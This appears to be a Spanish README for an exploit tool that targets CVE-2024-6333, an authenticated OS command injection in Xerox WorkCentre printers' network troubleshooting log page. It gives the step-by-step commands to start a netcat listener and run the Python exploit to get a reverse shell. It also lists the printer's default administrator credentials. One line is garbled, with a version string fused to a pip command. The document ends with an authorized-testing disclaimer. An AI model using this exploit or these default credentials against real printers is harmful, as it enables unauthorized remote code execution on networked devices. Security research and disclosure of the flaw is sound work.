
Vulnerabilidad de ejecución remota de código autenticada en impresoras Xerox WorkCentre a través de la función Network Troubleshooting Log.
Vulnerabilidad de ejecución remota de código autenticada en impresoras Xerox WorkCentre a través de la función de registro de diagnóstico de red.
La funcionalidad de registro de diagnóstico de red (/properties/security/network_troubleshooting_log.php) no sanea el parámetro de servidor de destino (security.nwtroubleshoot.destination.server), lo que permite a un administrador autenticado inyectar comandos arbitrarios del sistema operativo. Cuando se inicia la captura del registro de red, la carga útil inyectada se ejecuta como un comando de shell, lo que resulta en ejecución remota de código.
073.110.019.14200)pip install -r requirements.txt
Inicie un listener en su máquina:
nc -lvnp 8443
Ejecute el exploit:
python3 CVE-2024-6333.py --target https://<PRINTER_IP> --lhost <YOUR_IP> --lport 8443
| Argumento | Obligatorio | Por defecto | Descripción |
|---|---|---|---|
--target | Sí | URL de destino (p. ej., https://192.0.2.1) | |
--lhost | Sí | Dirección IP del listener | |
--lport | No | 8443 | Puerto del listener |
--user | No | admin | Nombre de usuario administrador |
--password | No | 1111 | Contraseña del administrador |
--proxy | No | URL de proxy (p. ej., http://127.0.0.1:8080) |
Esta herramienta se proporciona únicamente para pruebas de seguridad autorizadas y fines educativos. El acceso no autorizado a sistemas informáticos es ilegal.